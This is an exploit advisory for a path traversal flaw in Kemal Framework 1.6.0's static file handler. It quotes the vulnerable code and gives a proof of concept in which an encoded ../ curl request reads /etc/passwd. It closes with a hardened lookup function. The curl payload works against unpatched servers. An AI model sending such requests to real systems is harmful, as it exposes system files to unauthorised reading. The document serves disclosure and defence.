Exploit Title: Kemal Framework 1.6.0 - Path Traversal
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 04.04.2025
Vendor Homepage: https://github.com/kemalcr
Software Link: https://github.com/kemalcr/kemal/archive/refs/tags/v1.6.0.zip
Tested Version: v1.6.0 (latest)
Tested on: Kali Linux
CVE: (Waiting for response)

🧩 Summary

A *Path Traversal vulnerability* exists in the Kemal::StaticFileHandler class of *Kemal Framework v1.6.0*. When serving static files from a user-defined public directory, the framework does not sanitize ../ sequences in user-supplied URIs. This allows unauthenticated attackers to access arbitrary files on the server.

🛠️ Affected Version

- Kemal Framework v1.6.0

📌 Vulnerable Code

In src/kemal/static_file_handler.cr:

request_path = URI.decode(original_path)
file_path = File.join(@public_dir, request_path)
# No check that file_path still lies inside @public_dir after decoding and joining.
if File.exists?(file_path)
  send_file(context, file_path)
end

No checks are performed to sanitize or reject traversal sequences (../), making it possible to access files outside the @public_dir.

🔥 Proof-of-Concept (PoC)

✅ 1. Create a New Kemal Project

mkdir kemal-test
cd kemal-test
crystal init app .

This command creates a sample Crystal application that includes a shard.yml file.

------------------------------

✅ 2. Edit shard.yml File

Edit the shard.yml file as follows:

name: kemal-test
version: 0.1.0

dependencies:
  kemal:
    github: kemalcr/kemal

------------------------------

✅ 3. Install the Required Packages

shards install

This command downloads and installs Kemal into the lib/ directory.

------------------------------

✅ 4. Edit src/kemal-test.cr File

Write the following content:

require "kemal"

get "/" do
  "Hello from Kemal!"
end

Kemal.config.public_folder = "./public"
Kemal.run

------------------------------

✅ 5. Create public/ directory

mkdir public

------------------------------

✅ 6. Start the Application

crystal run src/kemal-test.cr

Go to the following address in your browser: http://localhost:3000

If you see "Hello from Kemal!", everything is working perfectly 🚀

------------------------------

✅ 7. Test the Vulnerability

curl "http://localhost:3000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

If successful, the contents of /etc/passwd will be returned as shown below:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
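For comparison, a hardened version of the lookup from the Vulnerable Code section, added here as an example and not Kemal's own code: it canonicalises the decoded path and refuses anything that resolves outside the public directory. The function name safe_static_path and its arguments are assumed names; public_dir stands for whatever Kemal.config.public_folder is set to.

```crystal
require "uri"

# Resolve a request path against the public directory and return the file to
# serve, or nil if the request must be rejected. (Added example, not Kemal code.)
def safe_static_path(public_dir : String, original_path : String) : String?
  request_path = URI.decode(original_path)

  # An embedded NUL byte would truncate the path at the OS level; reject it outright.
  return nil if request_path.includes?('\0')

  base = File.expand_path(public_dir)
  # Join first, so a leading "/" in the URI stays relative to the public dir,
  # then canonicalise: expand_path collapses "." and ".." segments.
  candidate = File.expand_path(File.join(base, request_path))

  # The resolved path must be the base itself or live strictly beneath it.
  # A bare starts_with?(base) is not enough: "/srv/public_old/x" starts with
  # "/srv/public" yet is outside that directory, hence the separator suffix.
  return nil unless candidate == base || candidate.starts_with?(base + File::SEPARATOR)

  # Serve regular files only, never directories or missing paths.
  # (Symlinks inside public_dir are not followed here; add a realpath check if
  # the public directory may contain links pointing elsewhere.)
  File.file?(candidate) ? candidate : nil
end

# The PoC path decodes to ../../../etc/passwd, resolves above the public
# directory and is refused; a normal asset path resolves inside it.
puts safe_static_path("./public", "/..%2f..%2f..%2fetc%2fpasswd").inspect # => nil
puts safe_static_path("./public", "/css/site.css").inspect
```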